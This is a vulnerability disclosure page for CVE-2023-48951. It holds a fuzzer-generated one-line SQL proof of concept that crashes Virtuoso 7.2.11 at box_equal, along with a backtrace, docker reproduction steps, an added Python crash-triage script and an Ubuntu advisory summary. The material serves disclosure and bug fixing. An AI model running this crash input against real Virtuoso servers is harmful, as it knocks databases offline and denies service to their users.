CVE-2023-48951: Fuzzer: Virtuoso 7.2.11 crashed at box_equal · Issue #1177 · openlink/virtuoso-opensource
An issue in the box_equal function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE v0 ( v1 SMALLINT CHECK ( CONTAINS ( 'del' , 'reabbreviating' , 'diamonds' ) ) ) ;
backtrace:
#0 0xdeab6a (box_equal+0xba)
#1 0x773df3 (sqlo_cname_ot+0x53)
#2 0x6e0161 (sqlo_df+0x461)
#3 0x6e0d6c (sqlo_df+0x106c)
#4 0x6e067f (sqlo_df+0x97f)
#5 0x70ea77 (sqlo_top_2+0x267)
#6 0x70e4a5 (sqlo_top_1+0x135)
#7 0x70ffa6 (sqlo_top_select+0x156)
#8 0x6b9b6f (sql_stmt_comp+0x8bf)
#9 0x6bc9d2 (sql_compile_1+0x1a62)
#10 0x4e213f (ddl_table_check_constraints_define_triggers+0x1af)
#11 0x4e462d (ddl_table_constraints+0xd0d)
#12 0x4e5331 (sql_ddl_node_input_1+0xbc1)
#13 0x4e57ee (sql_ddl_node_input+0x10e)
#14 0x7bcb0b (ddl_node_input_1+0x19b)
#15 0x7bd1e7 (qn_without_ac_at+0xc7)
#16 0x7af05e (qn_input+0x3ce)
#17 0x7c1be9 (qr_dml_array_exec+0x839)
#18 0x7ce602 (sf_sql_execute+0x15d2)
#19 0x7cecde (sf_sql_execute_w+0x17e)
#20 0x7d799d (sf_sql_execute_wrapper+0x3d)
#21 0xe214bc (future_wrapper+0x3fc)
#22 0xe28dbe (_thread_boot+0x11e)
#23 0x7f4182517609 (start_thread+0xd9)
#24 0x7f41822e7133 (clone+0x43)
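As an added triage example (not code from the issue or from the Virtuoso project), the following Python parses the fuzzer's "#N 0xADDR (symbol+0xOFF)" backtrace format, derives a crash-bucket signature from the innermost application frames, and checks which entry points lie on the path to the crash. The SCAFFOLD set of thread/RPC frames to ignore is an assumption of the example; the sample backtrace embedded in it is copied from the trace above so the script runs offline.

```python
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass
from typing import List, Tuple

# One frame as printed by the reporter's fuzzer: "#N 0xADDR (symbol+0xOFFSET)".
FRAME_RE = re.compile(r"#(\d+)\s+(0x[0-9a-fA-F]+)\s+\((\w+)\+(0x[0-9a-fA-F]+)\)")

# Thread/RPC scaffolding that is not part of the crash site (assumption of this
# example, chosen from the trace above; adjust for other call paths).
SCAFFOLD = {
    "sf_sql_execute", "sf_sql_execute_w", "sf_sql_execute_wrapper",
    "future_wrapper", "_thread_boot", "start_thread", "clone",
}

@dataclass(frozen=True)
class Frame:
    index: int
    address: int
    symbol: str
    offset: int

def parse_backtrace(text: str) -> List[Frame]:
    """Parse a backtrace (one line or many) into frames ordered innermost first."""
    frames = [Frame(int(i), int(addr, 16), sym, int(off, 16))
              for i, addr, sym, off in FRAME_RE.findall(text)]
    return sorted(frames, key=lambda f: f.index)

def crash_signature(frames: List[Frame], depth: int = 3) -> Tuple[str, ...]:
    """Top `depth` application symbols, scaffolding dropped and consecutive repeats
    (recursion, e.g. sqlo_df x3) collapsed. Same signature usually means same bug."""
    sig: List[str] = []
    for f in frames:
        if f.symbol in SCAFFOLD:
            continue
        if not sig or sig[-1] != f.symbol:
            sig.append(f.symbol)
        if len(sig) == depth:
            break
    return tuple(sig)

def bucket_id(frames: List[Frame], depth: int = 3) -> str:
    """Short stable hash of the signature, usable as a dedup key in a crash database."""
    joined = "|".join(crash_signature(frames, depth))
    return hashlib.sha256(joined.encode()).hexdigest()[:16]

def reached_via(frames: List[Frame], symbol: str) -> bool:
    """True if `symbol` is anywhere on the call path to the crash (e.g. a DDL entry point)."""
    return any(f.symbol == symbol for f in frames)

# Sample input: the backtrace from the issue, embedded so the example runs offline.
BACKTRACE = """#0 0xdeab6a (box_equal+0xba) #1 0x773df3 (sqlo_cname_ot+0x53) #2 0x6e0161 (sqlo_df+0x461)
#3 0x6e0d6c (sqlo_df+0x106c) #4 0x6e067f (sqlo_df+0x97f) #5 0x70ea77 (sqlo_top_2+0x267)
#6 0x70e4a5 (sqlo_top_1+0x135) #7 0x70ffa6 (sqlo_top_select+0x156) #8 0x6b9b6f (sql_stmt_comp+0x8bf)
#9 0x6bc9d2 (sql_compile_1+0x1a62) #10 0x4e213f (ddl_table_check_constraints_define_triggers+0x1af)
#11 0x4e462d (ddl_table_constraints+0xd0d) #12 0x4e5331 (sql_ddl_node_input_1+0xbc1)
#13 0x4e57ee (sql_ddl_node_input+0x10e) #14 0x7bcb0b (ddl_node_input_1+0x19b) #15 0x7bd1e7 (qn_without_ac_at+0xc7)
#16 0x7af05e (qn_input+0x3ce) #17 0x7c1be9 (qr_dml_array_exec+0x839) #18 0x7ce602 (sf_sql_execute+0x15d2)
#19 0x7cecde (sf_sql_execute_w+0x17e) #20 0x7d799d (sf_sql_execute_wrapper+0x3d) #21 0xe214bc (future_wrapper+0x3fc)
#22 0xe28dbe (_thread_boot+0x11e) #23 0x7f4182517609 (start_thread+0xd9) #24 0x7f41822e7133 (clone+0x43)"""

FRAMES = parse_backtrace(BACKTRACE)

if __name__ == "__main__":
    print("frames:", len(FRAMES))
    print("crash site:", FRAMES[0].symbol, hex(FRAMES[0].offset))
    print("signature:", crash_signature(FRAMES), "bucket:", bucket_id(FRAMES))
    # The trace passes through the CHECK-constraint compiler, which matches the
    # CREATE TABLE ... CHECK(...) PoC: the SELECT is compiled as part of the DDL.
    print("via CHECK constraint compile:",
          reached_via(FRAMES, "ddl_table_check_constraints_define_triggers"))
```

The signature deliberately ignores addresses and offsets, so the same bug found in differently linked builds of the same source still lands in one bucket; raising `depth` splits buckets further when two distinct bugs share a crash site such as box_equal.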
ways to reproduce (write poc to the file /tmp/test.sql first):
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait for the server to start
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba
Related news
Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.